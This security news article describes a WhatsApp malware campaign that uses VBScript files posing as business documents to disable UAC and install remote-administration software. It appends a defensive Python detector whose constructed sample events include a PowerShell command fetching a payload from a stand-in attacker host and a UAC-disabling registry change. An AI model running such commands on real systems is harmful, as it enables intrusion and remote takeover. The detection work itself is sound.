WhatsApp Phishing Attack Uses Fake Business Documents to Hack PCs


What happened

An ongoing malware campaign is targeting WhatsApp users in multiple countries with deceptive messages that deliver malicious VBScript files disguised as business and financial documents.

The campaign uses compromised WhatsApp accounts to send malicious files to people in the victim’s contact list. The files are named to look like financial reports, billing statements, account notices, and other business-related documents. The filenames are localized in multiple languages, reflecting the campaign’s global reach.

Kaspersky telemetry shows the campaign spreading across Brazil, India, Mexico, Singapore, the United Kingdom, Spain, Taiwan, Australia, Russia, Vietnam, and Malaysia.

The attack starts when a recipient downloads and opens the malicious VBScript file on Windows. The script then fetches additional scripts from attacker-controlled infrastructure. Those scripts disable User Account Control protections through registry changes and download a ZIP archive containing ManageEngine Endpoint Central.

ManageEngine Endpoint Central is a legitimate IT administration tool used to manage systems from a centralized dashboard. In this campaign, the software is silently installed in the background and configured to connect to attacker-controlled management servers, giving the attackers remote administration access to the victim’s computer.

Kaspersky said the exact method used to compromise the WhatsApp accounts remains unknown. The company also found signs of Chinese language use and infrastructure overlap with IPs previously associated with ValleyRAT and Gh0st RAT activity, but there is not enough evidence for high-confidence attribution.

Who is affected

WhatsApp users in multiple countries are affected, especially users who receive unexpected file attachments from known contacts.

Windows users are particularly exposed because the infection chain relies on opening a malicious VBScript file that executes through Windows Script Host. Users accessing the file through WhatsApp Desktop may face greater risk because the file can be executed directly, while WhatsApp Web requires the file to be downloaded first.

Organizations may also be affected if employees receive and open malicious business-themed files on work devices, allowing attackers to install remote management software and gain access to corporate systems.

Why CISOs should care

This campaign shows how trusted messaging platforms can become malware delivery channels when attackers compromise user accounts. The malicious messages come from known contacts, which can lower suspicion and make phishing awareness more difficult.

The use of legitimate remote administration software is also significant. ManageEngine Endpoint Central is not inherently malicious, but in this campaign it is silently installed and configured to give attackers remote access. That makes detection harder because security tools may treat the software as legitimate unless its context and configuration are monitored.

For CISOs, the attack reinforces the need to extend phishing defenses beyond email. Employees increasingly receive business documents through messaging platforms, and attackers are adapting by using WhatsApp contacts, localized filenames, and familiar document themes to drive execution.

3 practical actions

  1. Warn users to verify unexpected files sent through messaging apps: The campaign spreads through compromised WhatsApp accounts and uses fake business or financial document names. Employees should verify unexpected files through a separate channel before downloading or opening them, even if they come from trusted contacts.
  2. Restrict risky script execution on Windows endpoints: The infection chain begins when users open a malicious VBScript file. Security teams should restrict unnecessary script execution, monitor Windows Script Host activity, and alert on scripts that download additional payloads or modify User Account Control settings.
  3. Monitor legitimate remote management tools for abuse: The attackers silently install ManageEngine Endpoint Central and connect it to attacker-controlled servers. CISOs should maintain an approved inventory of remote administration tools, alert on unauthorized installations, and investigate systems connecting to unfamiliar management infrastructure.
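Actions 2 and 3 above describe the chain to watch for on Windows endpoints: Windows Script Host running a VBScript from a user location, the script host spawning a downloader, and the same process chain rewriting UAC policy values. The detection logic below is an added example written for this page, not code from the article or from Kaspersky; it runs over constructed Sysmon-style events, and the UAC registry key and value names it checks are the well-known Windows locations, assumed here because the article does not name them.

```python
import re

# Constructed Sysmon-style events (sample data, not from the article): process events
# carry image, parent and cmdline; registry events carry key, value name and data.
WSH = {"wscript.exe", "cscript.exe"}
DOWNLOADERS = {"powershell.exe", "curl.exe", "certutil.exe", "bitsadmin.exe", "mshta.exe"}
# Well-known UAC policy location and values (assumed; the article names none).
UAC_KEY = r"hklm\software\microsoft\windows\currentversion\policies\system"
UAC_VALUES = {"enablelua", "consentpromptbehavioradmin", "promptonsecuredesktop"}
USER_VBS = re.compile(r"\\users\\[^\\]+\\.*\.vbs\b", re.IGNORECASE)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def analyze(events):
    alerts = []  # (rule, pid, detail) tuples for events matching the campaign's chain
    for e in events:
        if e["type"] == "process":
            img, parent, cmd = basename(e["image"]), basename(e["parent"]), e["cmdline"]
            # 1. Windows Script Host running a .vbs from a user-writable location.
            if img in WSH and USER_VBS.search(cmd):
                alerts.append(("wsh_user_vbs", e["pid"], cmd))
            # 2. A script host spawning a tool that fetches more content over HTTP(S).
            if parent in WSH and img in DOWNLOADERS and re.search(r"https?://", cmd, re.I):
                alerts.append(("wsh_spawned_downloader", e["pid"], cmd))
        elif e["type"] == "registry":
            # 3. UAC policy values rewritten by a script host or downloader process.
            if (e["key"].lower() == UAC_KEY and e["value"].lower() in UAC_VALUES
                    and basename(e["image"]) in WSH | DOWNLOADERS):
                alerts.append(("uac_policy_tamper", e["pid"], f"{e['value']}={e['data']}"))
    return alerts

SAMPLE_EVENTS = [  # constructed; user names, hosts and paths are placeholders
    {"type": "process", "pid": 41, "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Users\ana\AppData\Local\WhatsApp\WhatsApp.exe",
     "cmdline": r'wscript.exe "C:\Users\ana\Downloads\Billing_Statement_Q3.vbs"'},
    {"type": "process", "pid": 42, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell -c iwr http://attacker.invalid/stage2.vbs -o $env:TEMP\\s.vbs"},
    {"type": "registry", "pid": 42, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
     "value": "EnableLUA", "data": "0"},
    {"type": "process", "pid": 43, "image": r"C:\Windows\System32\cscript.exe",  # benign logon script
     "parent": r"C:\Windows\System32\userinit.exe",
     "cmdline": r"cscript.exe \\dc01.corp.invalid\netlogon\mapdrives.vbs"},
]

if __name__ == "__main__":
    for rule, pid, detail in analyze(SAMPLE_EVENTS):
        print(f"[{rule}] pid={pid} {detail}")
```

The benign logon script in the sample produces no alert, while the three stages of the described chain each produce one; in production the same rules map onto Sysmon event IDs 1 (process creation) and 13 (registry value set).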

John Kevin Hao is a news and feature writer covering cybersecurity, technology, and business for professional audiences.